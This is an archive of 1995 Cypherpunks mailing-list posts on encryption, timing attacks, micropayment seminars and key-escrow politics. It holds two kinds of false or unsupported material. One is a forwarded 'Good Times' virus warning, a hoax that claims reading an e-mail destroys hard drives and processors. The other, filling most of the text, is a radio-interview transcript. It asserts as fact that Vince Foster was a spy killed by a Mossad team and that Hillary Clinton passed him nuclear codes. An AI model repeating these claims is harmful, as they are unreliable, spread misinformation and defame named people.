44236 From tjm at easynet.co.uk Tue Dec 12 10:38:33 1995 From: tjm at easynet.co.uk (Terence Joseph Mallon) Date: Wed, 13 Dec 1995 02:38:33 +0800 Subject: YOUR ADVICE AND HELP PLEASE...... Message-ID: Dear fellow Cypherpunks, I write to ask for your help. In the new year I am to begin a three level internet course - beginners, intermediate and advanced. Both privacy and security have been and are an interest of mine and unlike many courses which I have approached and conversed with I do not see these areas as some remote aspect of the advanced level - I see them as constituents of each level, through out the levels, and certainly from the beginning - as I have lurked here for the past while as a subscriber and prior that from afar I believe we all would agree with this. Yes, I am a virgin cypherpunk but not a virgin to both privacy and security as growing up in Northern Ireland I have seen them both in abundance and at other times lacking - the official / the unofficial - how they both took away life.... What I write to ask for is some pointers to direct me and if possible some personal comments in regards to these aspects. I personally use PGP but am ignorant to where this program is in the broader field of cryptography and what other programs are which have been mentioned on the mailing list. Excuse my lack of knowledge in technical terms but I am acute to them in the realm of the street. THE STREETS HAVE CHANGED TO CABLES AND THE BUILDINGS HAVE BECOME CPUs - WE ARE ALL GRAPHICS/TEXT/SOUNDS/VIDEO...........LANGUAGE. Can you please help me, as this information shall be passed on to others to make them aware and to help them - as it has helped you all, as it is helping me.... Thanking you all, in anticipation of hearing from you and wishing all a very happy as well as a safe Xmas and a lucky new year. Yours faithfully, Terence. "Irish eyes are smiling, I miss the emerald isle." -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCPAzCsvtYAAAEEANjIsO3Q0cSdEgYifAiA5+aUEVSBFFZTZIpqQXbgXxExsrjk bFiJ6haaWaD60KPjxH8QJ8PHr9x2tk2K1ktpbcL2+YjPHd+fJzqgz3llu2FV1Xu/ k1C7SWA5G8Do66I0MrQD3/jbAI2zp/0LnVoiI7LWCvPPKoxYCiHdIQ/n5PcJABEB AAG0JVRlcmVuY2UgSi4gTWFsbG9uIDx0am1AZWFzeW5ldC5jby51az6JAJUDBRAw uju1Id0hD+fk9wkBAXuUBACjGEmj3AO/rSUD0WRRHdYjDfR8L1FvcV0J/ZNwp7WJ 2cmHvtecLaOlTVWulRhVI6suUSwwzBYZFWmHJA7lR67gLZN8xqWyo/jWPVLDxAte pdC7ruZI1ZrFc90uPpymnVdC00gwgcG3F4RDQ9B1uY+4KiNG//fULwT6xUVzthak qA== =QN61 -----END PGP PUBLIC KEY BLOCK----- From WheatonB at 603cs.croughton.af.mil Tue Dec 12 11:24:21 1995 From: WheatonB at 603cs.croughton.af.mil (WheatonB at 603cs.croughton.af.mil) Date: Wed, 13 Dec 1995 03:24:21 +0800 Subject: F. Y. I. Message-ID: <9511128188.AA818815409@603cs.croughton.af.mil> To all. This is something I received from a fellow Internet user in the States. I don't know where he got this info, but I thought we may all benefit from this warning. SrA Lounsbury sends... ______________________________ Forward Header __________________________________ Just in case you missed this info.... >>>>>>SUBJECT: VIRUSES--IMPORTANT PLEASE READ IMMEDIATELY >>>>>> >>>>>> There is a computer virus that is being sent across the >>>>>>Internet. If you receive an e-mail message with the subject >>>>>>line "Good Times", DO NOT read the message, DELETE it >>>>>>immediately. Please read the messages below. Some miscreant >>>>>>is sending e-mail under the title "Good Times" nation wide, >>>>>>if you get anything like this, DON'T DOWN LOAD THE FILE! It >>>>>>has a virus that rewrites your hard drive, obliterating >>>>>>anything on it. Please be careful and forward this mail to >>>>>>anyone you care about. >>>>>> >>>>>>************************************************************* >>>>>> >>>>>>WARNING!!!!!!! INTERNET VIRUS >>>>>> >>>>>> The FCC released a warning last Wednesday concerning a >>>>>>matter of major importance to any regular user of the >>>>>>Internet. Apparently a new computer virus has been >>>>>>engineered by a user of AMERICA ON LINE that is unparalleled >>>>>>in its destructive capability. Other more well-known viruses >>>>>>such as "Stoned", "Airwolf" and "Michaelangelo" pale in >>>>>>comparison to the prospects of this newest creation by a >>>>>>warped mentality. What makes this virus so terrifying, said >>>>>>the FCC, is the fact that no program needs to be exchanged >>>>>>for a new computer to be infected. It can be spread through >>>>>>the existing e-mail systems of the Internet. Once a computer >>>>>>is infected, one of several things can happen. If the >>>>>>computer contains a hard drive, that will most likely be >>>>>>destroyed. If the program is not stopped, the computer's >>>>>>processor will be placed in an nth-complexity infinite binary >>>>>>loop -which can severely damage the processor if left running >>>>>>that way too long. >>>>>> >>>>>> Unfortunately, most novice computer users will not >>>>>>realize what is happening until it is far too late. Luckily, >>>>>>there is one sure means of detecting what is now known as the >>>>>>"Good Times" virus. It always travels to new computers the >>>>>>same way in a text email message with the subject line >>>>>>reading "Good Times". Avoiding infection is easy once the >>>>>>file has been received- not reading it! The act of loading >>>>>>the file into the mail server's ASCII buffer causes the "Good >>>>>>Times" mainline program to initialize and execute. >>>>>> >>>>>> The program is highly intelligent- it will send copies of >>>>>>itself to everyone whose e-mail address is contained in a >>>>>>receive-mail file or a sent-mail file, if it can find one. It >>>>>>will then proceed to trash the computer it is running on. The >>>>>>bottom line here is - if you receive a file with the subject >>>>>>line "Good Times", delete it immediately! Do not read it" >>>>>>Rest assured that whoever's name was on the "From" line was >>>>>>surely struck by the virus. Warn your friends and local >>>>>>system users of this newest threat to the Internet! It could >>>>>>save them a lot of time and money. _________________________________________________________ Category: From adam at lighthouse.homeport.org Tue Dec 12 12:31:34 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Wed, 13 Dec 1995 04:31:34 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512121525.KAA09078@homeport.org> Message-ID: <199512121759.MAA09353@homeport.org> Nope, I'm wrong, as Fred and Simon point out. The noise makes finding the times more difficult by some small factor, nothing more. I'll stop writing these things in the morning. :) I wrote: | Does the delay have to be random, or does the total time for a | transacation need to be unrelated to the bits in the secret key? | Assume that the time added is pseudo-random (and confidential). | Further, for any non-overlapping group of N transactions, the | distribution of the times fits some predetermined curve, say a bell | curve. | | We've added a non random number, but since those numbers end | up being a curve, it would be difficult to determine which transaction | got which time added to it. This resembles the 'make them all a | constant time', but allows us to send out some in a shorter time than | the maximum (although most transactions should probably take longer | than the average.) From PasPossible at hudson.lm.com Wed Dec 13 04:39:59 1995 From: PasPossible at hudson.lm.com (JustMe) Date: Wed, 13 Dec 95 04:39:59 PST Subject: PGP status in russia Message-ID: does anybody know the legal status of using encrypted email in russia? i'm trying to talk nasty to a lady in moscow who's using a borrowed account and we'd like to keep the messages somewhat private anybody know the law there? thanks From anon-remailer at utopia.hacktic.nl Tue Dec 12 13:08:45 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 13 Dec 1995 05:08:45 +0800 Subject: chaotic signal cryptography Message-ID: <199512121900.UAA00315@utopia.hacktic.nl> On Mon, 11 Dec 1995 12:00:38 -0500 (EST), L. Den-Hollander wrote (in part): >A few years back i ran thru a paper emanating >from a navy labs researcher (i think the name was Peccora) >about using synchronised chaotic signal generators as a >signal scrambling/encrytpion scheme. I too am interested in this technique. I may be wrong, but it seems like a variation on the one-time pad. Any comments on this technique (usefulness, robustness, etc.)? Hooker From bdavis at thepoint.net Tue Dec 12 13:09:37 1995 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 13 Dec 1995 05:09:37 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512121533.JAA21362@cdale1.midwest.net> Message-ID: On Tue, 12 Dec 1995, David E. Smith wrote: > At 04:45 AM 12/12/95 -0500, Black Unicorn wrote: > > >> | PS - I think Paul was a bit surprised when Jim Barksdale pulled > >> | out his wallet and handed him 10 crisp $100 bills. :-) > >> Great. mention it where the IRS is sure to be listening. :) > >Why would the IRS listen? Everyone knows the tax system is voluntary. > > Do you know something I don't? :) > Would you mind sharing? :) Try misc.taxes for the tax protestor arguments (which fail of course). But by asking, you may be on "their" list (and I don't mean a list held by tax protestors but by a TLA). And if you're reallllllly bad about it, one of my buddies may decide to invite you in ... EBD > > Dave > ----- David E. Smith, c/o Southeast Missouri State University > 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 From rah at shipwright.com Tue Dec 12 13:26:20 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 13 Dec 1995 05:26:20 +0800 Subject: (dcsb) CIS SEMINAR--December 15--Manasse, Micali, Rivest, Shamir--2:00pm Message-ID: --- begin forwarded text From: lethin at ai.mit.edu (Rich Lethin) Date: Tue, 12 Dec 1995 14:12:26 -0500 To: bsdc at ai.mit.edu Subject: [joanne at theory.lcs.mit.edu: CIS SEMINAR--December 15--Manasse, Micali, Rivest, Shamir--2:00pm] Sender: bounce-dcsb at ai.mit.edu Precedence: bulk Reply-To: lethin at ai.mit.edu (Rich Lethin) Seminar at MIT. Return-Path: From: joanne at theory.lcs.mit.edu (Joanne Talbot) Date: Tue, 12 Dec 95 12:38:38 EST To: theory-seminars at theory.lcs.mit.edu Reply-To: theory-seminars-request at theory.lcs.mit.edu Subject: CIS SEMINAR--December 15--Manasse, Micali, Rivest, Shamir--2:00pm **Of interest. CIS-SEMINAR Title: Micropayment schemes, light-weight signatures, and public-key certification Speakers: Mark Manasse, Ron Rivest, Adi Shamir, and Silvio Micali Time: 2:00-3:30 Friday, December 15th, 1995 Where: Room NE43-518, 545 Technology Square Abstract: We present four short talks on related subject matter: (1) Mark Manasse will present his micropayment scheme "Millicent". (2) Ron Rivest will present the "PayWord" micropayment scheme. (3) Adi Shamir will present the "MicroMint" micropayment scheme. (4) Silvio Micali will present an enhanced certificate revocation system. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From Webmaster at fornits.com Tue Dec 12 13:27:23 1995 From: Webmaster at fornits.com (Ginger Warbis) Date: Wed, 13 Dec 1995 05:27:23 +0800 Subject: Netscape announces position against GAK Message-ID: <199512121939.OAA17633@www2.clever.net> >On Fri, 8 Dec 1995, James A. Donald wrote: > >> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote: >> >Credit where credit is due. >> > >> >I for one am satisfied--and even pleased--with the Netscape position on GAK. >> >> Well I for one, am serious unsatisfied, but it is not so bad as >> to merit a campaign against Netscape. > >I think it's a good start. I would like to see how much effort after >this really pans out. Doesn't take much to put out a policy statement. >Takes a lot to follow it through. > Greetings all. May I also point out that the power of self government is at least as effective when rewarding good behavior as when punishing bad. You guys are the experts in this particular political niche, but from the viewpoint of a more or less innocent stander-by, the statement sounded to me like "OK, we went, we listened, they were full of shit, the line is HERE." and I'm quite satisfied. -- Bill & or Ginger Warbis WebMaster at Fornits.com - http://fornits.com/ "The more corrupt the state, the more numerous the laws." Tacitus, Roman senator and historian (A.D. c.56- c.115) From jon.roland at the-spa.com Tue Dec 12 13:27:48 1995 From: jon.roland at the-spa.com (Jon Roland) Date: Wed, 13 Dec 1995 05:27:48 +0800 Subject: Jim Quinn interview of James Norman (edited) Message-ID: <199512120247.SAA12705@nova.unix.portal.com> I have further attempted to edit the interview transcript, cleaning up spelling, punctuation, and occasionally guessing what was probably taken down wrong, from context, (and without the benefit of hearing the actual interview tape). ============================================================================ The following is a Radio Interview between James Norman, formerly Senior Editor of Forbes Magazine and now with Media Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. In this interview from December 7th, they discuss issues of national importance and STUNNING IMPACT. Essentially they give out the reason for Vincent Foster's Death, and the fact that the "resignations" of the Congresspersons are NOT for policy reasons but because they have been caught with millions in corrupt funds in Swiss Banks. Read this to learn what the "mainstream media" doesn't ever tell you... Quinn's Interview with Jim Norman QUINN: Jim Norman, former Senior Editor at Forbes Magazine, and currently writing for Media Bypass Magazine after having uncovered Caspar Weinberger's Swiss bank account (we do get punished for some of the truths we uncover, do we not?). Jim is on the phone with us this morning. Good Morning, Jim. NORMAN: Hi, how are you? QUINN: Pretty good. I want to give people a chance to get an idea of what it is we are going to launch into after 8 o'clock, and I want to give some background into this. Is it fair to say that since Iran-Contra that the government has sort of been involved in the drug business? NORMAN: Yes, it goes way back before then, actually. It goes back even to the Vietnam War days -- remember the Golden Triangle, Laos, Cambodia and all that, Pakistan and Afghanistan, but it was always on a much smaller scale. What apparently happened was that in the 80s we got into it in a big way, basically nationalizing the wholesale importation of drugs from Central and South America. The idea was that we control it somehow that way; instead, it has just become the tail wagging the dog, I think. QUINN: It's become the funding source for just about anything that the government covertly wants to do, and for the moneys that various elements of the government don't want to ask the Congress for, nor do they want Congress to know about. NORMAN: Right. And it's an arms business, too. They are kind of all tied up together. QUINN: So it's arms and drugs? NORMAN: Right. QUINN: Kenneth Starr is currently our Whitewater prosecutor, and I have long said on this show that I find Ken Starr interesting but also troubling in that there are many elements to the Whitewater scandal. Part of the laments have to do with banking and have to do with Madison Savings and Loan, check kiting, stuff that went on with the Arkansas Development Financial Authority, but basically there are really two elements -- there is Whitewater and then there is all the stuff with Mena Airport, Iran-Contra, drugs into the country, various unexplained deaths, one of them Vince Foster, the possibility of espionage on the part of the first lady, and all of this lies behind a brick wall that Mr. Starr has been positioned upon to make sure that they get Clinton but that the fire doesn't burn past that wall; because on the other side of that wall are Republicans and Democrats. Am I right? NORMAN: That's right. He is not looking at Mena; he doesn't have the authority to from Janet Reno. He does have authority to look at the Vince Foster death, but I think only inasmuch as it relates to the Whitewater situation. The whole thing is hemmed in and beyond that is this whole national security blanket that has been thrown over big parts of this thing that you couldn't touch if you wanted to. QUINN: It's interesting, I find, that Dr. Henry Lee, who was part of the defense team for the Simpson trial, has ended up working on the Vince Foster affair. The word that I get is that he is going to say it was indeed a suicide. You have to remember something about Dr. Henry Lee -- he was, oddly enough, the guy that was called in to do some work on the Danny Casolaro death down in Martinsburg, way back in the early nineties. Was it 1991? NORMAN: I think it was 1991. QUINN: This was that reporter that you may have heard about that was found dead in a motel room, supposedly from a self-inflicted wound, even though the papers (a year's worth of investigative reporting) were all missing. He was working on the story that he called the "octopus" and basically it's the same story that you are working on, isn't it? NORMAN: Yes, I know I'm talking to a lot of the same sources. Danny supposedly slashed his wrists twelve times, sometimes deep enough to cut the tendon. QUINN: Yeah, right. And his files were all missing. Sure, there's a suicide. Right. And they embalmed his body before they even had a chance to inform his parents that he was dead. So it's another "Arkanside." NORMAN: George Williamson, who is an investigative reporter out of San Francisco, has been working on that. He has come up with all kinds of stuff -- other witnesses that have disappeared, people in the hotel who just aren't there anymore -- disappeared mysteriously. QUINN: It's interesting. There are a lot of people who are witnesses to various deaths involved with this Arkansas crowd, Danny Casolaro for one. Also, the two young boys on the railroad tracks down in Arkansas who stumbled on the drug operation. A lot of the witnesses around that have met violent and untimely deaths as well. So here are a great deal of ugly people involved in this. We are going to get down to what it all means in terms of government corruption and scandal of immense proportions that touch both parties. This is really nonpartisan. The fact that I don't happen to like "President Pantload" doesn't have a whole lot to do with this; he was just sort of a guy who happened to be there with his hand out at the time. It all goes back to the late 70's, right Jim? NORMAN: Yeah, and even before that. Let's start with the early 80s when Bill Casey came into office in the CIA under Ronald Reagan. That's when our government decided to embark on this amazing and extremely unbelievably successful effort to spy on the world's banks. We did it! We have been spying on world banking transactions for more than a dozen years. The way we do it is by basically forcing foreign banks, wittingly or unwittingly, to buy bugged software and bugged computers that let our NSA (National Security Agency) which is the intelligence arm of the government, to basically surveil wire transfers all over the globe. QUINN: Let me ask you this. How do you sucker the rest of the banking community around the globe into buying the software that you are selling? NORMAN: First of all you sell to front companies like this company Systematics in Arkansas, now called Alltel Information Services. They had another company called Boston Systematics, an affiliate based in Israel mainly. There is Robert Maxwell, the UK publisher, who is fronting this stuff. There are a whole bunch of people fronting this. QUINN: Wait a minute, Robert Maxwell -- isn't he dead? NORMAN: Yeah, he is now. QUINN: Didn't he have an unfortunate accident? NORMAN: Fell off his yacht in the Atlantic Ocean somewhere. QUINN: Why, isn't that amazing! NORMAN: The tinkering of it was mainly putting back doors, just a few lines of code, that would allow somebody to dial into a computer without leaving any footprints, any audit trail that you were in there. Then you could go around and look around in files or you could collect information from a system without the user even knowing it QUINN: Now this software, which was originally called Promis, was stolen from a company called Inslaw by the Justice Department. It ended up somewhere, probably at E-Systems or somewhere, and it was converted into banking software. It Started out as software designed to track prosecutorial cases around the country. My question is -- why didn't Ed Meese just pay the damn bill, and none of this would ever have come to light! Danny Casolaro was chasing the stolen software when he stumbled on what it was being used for. NORMAN: Well, the trouble with it was that they bought it for use in the Justice Department, but they were going to use it all over the place. If they were paying royalties on it, Inslaw would know just how extensive the use was of the software, and they didn't want people to know how extensively it was going to be used. QUINN: I see... NORMAN: Plus, a lot of the profits from the resale of this went back into private profits. It was customized and resold to the intelligence community. It became sort of a basic platform database tracking system for most of our intelligence agencies and many of those abroad. The idea was "Well, we can all talk to each other now." In fact what it has allowed us to do is basically rifle through other people's data files abroad too, because the stuff was apparently being sold to foreign intelligence agencies and it was also bugged. We have other ways of basically surveilling and downloading foreign electronic databases. The whole computer world is much more porous and transparent than anybody wants you to believe. QUINN: There is a bank here that I know that uses this software right here in this town, and I'm sure that there is probably more than one. Everybody's got it. NORMAN: In some form or another. It goes under different names now. It's been modified many times. I think when Inslaw had it, it was a half million lines of code. I'm told now it's a couple of million lines anyway. It's gone through many, many modifications over the years. QUINN: This company, Systematics, which is I believe still 8% owned by Jackson Stevens at Stevens Inc., who, by the way, is one of the backers of Bob Dole -- how troubling is that? NORMAN: He is the co-chairman of Dole's finance committee. QUINN: That's right! Bob's in town -- Hi Bob -- You'd better explain this. You'd better explain Mena, too, Bob, or it's going to follow you to the White House. Systematics, I understand, had an attorney who was kind of off the record doing work for them, named Vince Foster. Is that true? NORMAN: Yep, that's true. We've heard that from many, many sources now. In fact, Jim Leach's committee has established that pretty well with some of the investigation that they have done. Foster was a trusted deal guy for Stevens at the law firm. Although Foster never shows up officially as an attorney of record for Systematics, he was definitely in the loop, basically smoothing out things between Systematics and the NSA, which was the main government agency that was contracting for a lot of this stuff. QUINN: So this is how Foster got involved in intelligence, right. NORMAN: Yes, because there is heavy duty code and computer technology stuff involved here. Apparently, some time in the early 80s he developed this relationship with the State of Israel. In fact, some of the same handlers I am told were involved in the Jonathan Pollard case. They basically nurtured him and groomed him for many years and then bingo, they hit the jackpot -- he ended up in the White House. Apparently he convinced Hillary to help him out on some stuff. QUINN: So... what is Foster involved in? It's the mid 80s... NORMAN: Mid 80s. Foster is at the Rose Law Firm. Think of him as a high-level marketing guy between Systematics and the NSA. NSA -- they have all these spooky contracts that they are trying to find contractors for. Foster would have been sort of a go-between there. Plus Hillary was actually an attorney of record for Systematics back in 1978 when Stevens tried to take over the Financial General Bank shares in Washington. Those bank holding companies later became First American - Clark Clifford, Robert Altman, all that crowd. QUINN: Yeah, the BCCI thing. NORMAN: Stevens was fronting for the BCCI crowd and trying to take over this Washington Bank Holding Co. The SEC blocked him at the time, partly because one of the things he was insisting on was that this company Systematics, which at that time was a tiny little thing in Arkansas, he was insisting that they be brought in to do all of the data processing for this multistate bank holding company in Washington. Hillary represented Systematics in that. Now the thing about Systematics at the time -- it was before they even got involved with the bank spying stuff. Abroad for many years, they had been what amounted to a laundromat for covert funds for the CIA and the intelligence community, quite legally, probably. It was done for the national interest. Somebody had to move this money around and Systematics was in a perfect place to do it because they owned the computers and a whole bunch of small banks. They could move this money around electronically without the bankers even knowing about it necessarily, and it wouldn't go through the normal clearing houses. The regulators wouldn't see it. It would just crop up wherever the CIA needed it in whatever bogus front company account, and it was all just bits and bytes; it was a cyberbank -- it still is. QUINN: I'm here with Jim Norman, former Senior Editor at Forbes Magazine. You know, it's interesting, here is a guy who was with Forbes Magazine, a respected senior editor who figured probably this would be his life's work. All of a sudden, he finds himself a defrocked commando journalist working for Media Bypass Magazine out of what? Evanston, Illinois, or somewhere in Indiana? NORMAN: Indiana. QUINN: Yeah, that's right. Now, I've got a question. Before we get into Vince Foster in the mid 80s and Hillary Clinton's role in this, how did you get onto this whole scandal? Where did you walk through the door on this? NORMAN: I came in the back door completely. Look, I had no ax to grind here against Bill Clinton or the Administration. I hated covering politics. I thought it was all baloney. I'm just a business writer, and I never wanted to get enmeshed in this whole Whitewater/Vince Foster thing, but it started -- for a couple of years I had been following this oil company bankruptcy up in Stamford, Connecticut, because I had covered oil. This thing never made sense to me. There is no reason why this company went bust and, in fact, when I actually got into it and started redoing the oil trading transactions, the reason they lost money: they weren't losing it. They were hiding it. They were parking it off shore with another company that was financing arms sales to Iraq, cluster bombs and stuff like that all through the 80s. And, this Chilean arms dealer, Cardone, who was providing weapons, was also, it turns out, brokering some of the sales of this stolen software. Okay, that gets me into the software story. QUINN: So that gets you onto the Promis software, and you and Danny Casolaro are now on the same road. NORMAN: Right, and then in the process of that, I started talking to a whole bunch of rather spooky, strange intelligence community characters, and I was sitting at a guy's living room down in Kentucky one day. He was sitting there in the middle of the night blowing smoke rings, and he said, "Yo, by the way, Vince Foster, he was under investigation." I said, "Under investigation, for what?" And, he said, "Well, it's spelled 'Espionage.'" BOINK!!... and that's how I got on this whole Vince Foster thing. QUINN: So that's how it happened? NORMAN: Yeah. QUINN: Okay, now here it is, the mid 80s. Vince Foster is working for Systematics, and he is coming into contact with the intelligence community. What is, how did Hillary Clinton and the Israeli Mossad and all of this come together and what happened? NORMAN: Well, I think that they had been... look the Israelis were key partners with us in this bank spying effort. This is a joint allied government effort, and the Israelis were one of the key front people in this, in selling and supporting this software all over the world, so that people weren't thinking they were getting the software directly from the U.S. You know, there was an Israeli front company used to sell this stuff to foreign banks. QUINN: Well, they sold it to the Moscow bank. I know that. NORMAN: Well, Systematics did, yeah, and Systematics got involved in supporting this stuff all over the world, a little company in Arkansas... Go figure. Come on. QUINN: Yeah, really. NORMAN: I mean, main software people, they operate in New York and places like that and not out of Podunk, Arkansas. So, at any rate, the Israelis had ties into this whole thing all along, and, you know, they are our friends. We do give them a lot of stuff and share a lot of stuff. QUINN: Well, the whole idea was to track terrorist money, and the Israelis have a great interest in that, and rightly so. There is no problem here. NORMAN: The name of this problem was "follow the money for terrorist reasons," but once you set that up, you can do all kinds of stuff with it. I mean, we were spying on everybody's money. I think that's probably how we helped bust the Soviet Union. We found out just how deep their pockets were, where their money was, who we could bribe. You know, acting as a financial destruction of their society more than anything. QUINN: So, how does Foster get involved in espionage? NORMAN: Well, I think it was money. Money, money, money. And, especially you know with this whole political thing, it takes so much money to run for office. I mean, my theory is that the actual spending is probably twice of what anybody declares when you add up all of the soft dollars and everything. I think there is a tremendous need for money there, and they just weren't real cautious about where it was coming from. I think this thing about selling state secrets to the Israeli's and other countries was just a business. It was just for money. I don't think there was any ideology involved here at all, and it was one of many businesses. There is also insider trading going on here. There was the kickback on drugs and arms stuff and so the money has to go... you have to hide it some way, so it goes into Swiss bank accounts. And Foster would have known that, yeah, we're tracking this money off shore, but there is such a blizzard of information that unless somebody knows exactly what they are looking for they would never find anything. They thought they could cover this up pretty well so Foster had... actually he had several accounts, and there was one in particular in this bank, bank at Villa Switsaria Italiano in Chaso on the Italian border. It is a little kind of a Mafia kind of community there reputed, and so he was taking the money in there for the payments from the Swiss. He was going to Geneva every six or eight months, and his curious one-day trips -- I don't think it was for sightseeing. QUINN: No. I'm sure he wasn't doing any real estate work for Arkansas. NORMAN: No. The whole thing about money laundering is... you know the money would go into a Swiss bank. Somebody would have to go physically and take it out and take it to a friendly bonded dealer or something like that, buy bearer bonds or other kinds of bonds or something that you could pledge as collateral for loans back in the states and turn it back into cash again legitimately, and so that is how money laundering works. Vince, in effect, was a bag man here because when they go to the White House all of a sudden they hit the jackpot. There was so much more goodies there, and, in fact, Deborah Goram, Foster's executive assistant, testified under oath that Foster had given her two, inch-thick ring binders from the National Security Agency to put in Bernie Nussbaum's safe in the White House. What were these binders? Well, I have talked to brokering experts on this stuff, and they say, "Look, when you are talking NSA binders in the White House, you are talking mainly one thing, and these are the codes and protocols by which the President authenticates himself when he has to call up the Pentagon to say 'let's go nuke somebody'." Now, what was Foster doing with these things? He had no business with them. He would have had no access to them. It would have to come from somebody with access to the Oval Office or the Presidential living quarters. QUINN: And, who would that be? NORMAN: Well, I think we know who we are talking about here. QUINN: We're talking about Hillary Clinton, aren't we? NORMAN: That's right. She has been under investigation in this whole thing, too, but I think that they had a strong case against Vince and not such a strong case against Hillary. But, you see what happened was, and this is another whole part of the story as to how they got onto Foster. Basically, there was a team of computer hackers and computer intelligence guys in the CIA who were going through most databases. They found names there that they identified as being Foster and Hillary. They put them under surveillance actually before they went to the White House. I think it was between the election and the time that they went to the White House, and that's when the alarm bells went off. They had been surveilling these accounts for a while, and when Foster on July 1, 1993, bought a ticket to Geneva, a round-trip one-day ticket to Geneva, these guys said, "Oops, he's going to take the money. We're going to beat him to it." And, they went in. They hacked their way into the bank and obtained the necessary authorization codes on this coded account for which no signature is required to withdraw money, by the way. QUINN: Right. NORMAN: They were able to effect their own technically legitimate wire transfer of this money back to the U.S. Treasury, where it sits in a holding account escrowed for use by the CIA. QUINN: So, the CIA empties Vince Foster's Swiss bank account of its ill-gotten money. NORMAN: Yeah, actually it wasn't the CIA. It was this sort of renegade vigilante group of guys they called the Fifth Column that has been out doing this stuff. They don't take any of the money for themselves. The money goes to the... QUINN: They just do it for fun? NORMAN: The CIA only gets the money. It is escrowed for use by the CIA but only when the CIA gets rid of a bunch of its bad apples there who've got dirty hands from drug kickbacks, arms. QUINN: Let's pick this story up. There was a meeting just before Vince Foster died on the eastern shore of Maryland in which Webster Hubbell, Vince Foster, and some others were present. Okay, this was just before Foster died. Pick up the story here. NORMAN: All right. Well, we mentioned July 1, 1993. Foster buys this round-trip ticket to Switzerland. They raid his account. They take out $2.73 million. Foster apparently calls up the bank to let them know he was coming. They say, "Oh, Vince don't you know you took the money out already?" Boing... that's when he found out he was under investigation. That's when he got so mysteriously depressed. It had nothing to do with editorials in the Wall Street Journal. He had his bank account raided big time, and he knew he was under surveillance, or he knew he was under investigation. And, that started this curious chain of events. Webster Hubbell testified that not so much Vince was depressed, but he was worried. He was afraid to use the White House telephones. The guy had heart palpitations. He couldn't sleep at night. His doctor gave him a prescription for sleeping pills. His sister tried to get him to talk to some psychiatrist. He never got in touch with them. Instead, he hired a high-powered lawyer in Washington, Jim Hamilton, this big deal white-collar crime fix-it guy who handles people who get hauled up for Congressional hearings. And, then there is this curious meeting the weekend before Foster died. He and his wife, Lisa, go down to the eastern shore of Maryland for a getaway weekend, and then, by coincidence, they meet Hubbell and his wife down there. Hubbell, also from the Rose Law Firm, at the time the country's de-facto top law enforcement law officer because Janet Reno in effect was taking her orders from Hubbell. They go over to the estate of Michael Cardoza, who is the son-in-law of Nathan Landau, a big deal Democratic fund-raiser, and Cardoza is also the head of Clinton's legal defense fund. Supposedly, this was all poolside chit chat. Baloney, it was damage control. They were trying to figure out how to contain this scandal from spreading to other people in the White House, and they were trying to lean on Vince to get him to, you know, cop a plea, go quietly, or shut up and don't talk about it. And, in fact, what my sources have told me is that there was actually a huge payment made to an account held by Lisa Foster, with more than $286,000, on the Friday before that meeting. QUINN: Wait a minute, on the Friday before that meeting, Lisa Foster's bank account gets a deposit of $286 million? NORMAN: $286,000, yeah. QUINN: I'm sorry, yeah, $286,000. Okay, so does she take it out? NORMAN: Well, I don't know what ever happened to that money. It is hard to tell where it came from even. It is all very mysterious to me, but it sure smells like hush money to me. It's like, "Look Vince, don't worry, we'll take care of your money." QUINN: You don't know if she wrote a check on it? NORMAN: Well, I'm told that it came through the hands somehow of Sheila Anthony, who was Foster's sister, and at the time she was a "congressional liaison" person at the Justice Department, whatever a congressional liaison is. QUINN: So she takes the money to Foster, and Foster turns it down? NORMAN: Well, no... I think he probably accepted it, or it went there. But, apparently, he was having second thoughts, I think. You know, on the Monday after they came back from this meeting, the records showed, the public records showed, that he has a parade of people coming by his office in the White House saying, "Hey, how'd your weekend go, Vince? You cool with this? I mean, you on board with all of this? Everything okay?" you know. Then,... QUINN: A lot of very nervous people in the White House. NORMAN: That's right. Then, the day he died he had like a two-hour meeting with another person from the Arkansas contingent there. I think the problem was that they were afraid that Vince was going to talk or that he was going to crack under questioning, and here's a guy who was now, at this point, under intense surveillance. I mean, he had not only CIA counter intelligence people, but you had NSA. You had FBI surveilling him. There was a four-person IRS team we know was assigned to tail this guy, probably in connection with the money laundering aspect of the Swiss bank account. QUINN: God, this thing's got everything but floats in the... I mean all they need is Goofy, a big balloon with ropes on it following this guy around. NORMAN: You almost did. I mean, you had the Secret Service with a bomb-sniffing dog squad out there checking his car in the parking lot. The video tapes of that, gone. The video tapes of the room where they are stored, gone. I mean, this whole thing is massively covered up, and I guess it is for national security reasons. QUINN: Well now, I understand that Foster had a meeting scheduled with Bill Clinton. I believe it was on a Wednesday. NORMAN: Right. QUINN: And, it was the Tuesday he was killed. NORMAN: Right. Exactly. The question is well, gee, was he going to drop something in the President's lap and blow the plausible deniability that he might have on this stuff. QUINN: Well, this Foster suicide thing is so sloppy. It leads me to believe that on Tuesday they thought he would take the money and shut up, and he didn't take it so they had to do something real quick. NORMAN: Well, that could be it or that even if he wanted to shut up maybe they were afraid he would crack under interrogation or something. You know, it is just somebody wanted him real dead, and there is a bunch of people who had ample reason for it. This was not suicide. It was not over depression. This was a political assassination carried out on U.S. soil by a foreign government. The Israelis were involved in this. There was apparently a three- person Mossad-contracted team that went into the apartment that Foster had gone to that afternoon where he was apparently lured by a female person from the White House staff who I think still works in the White House. QUINN: Now, who would that be? NORMAN: Well, I... QUINN: Because, he had sex with her? NORMAN: That's the impression, yeah. QUINN: I mean, there was semen on his shorts. There was brownish- blonde hair on his clothing and rug fibers all over him which may or may not have had to do with having sex on the floor. It might have been... NORMAN: No, I think that was because he was rolled up in a rug afterwards and taken over to Fort Marcy Park. Now, the question is, were elements of our intelligence community involved in helping to dispose of the body and cover it up some way? QUINN: Who is the woman in the White House? 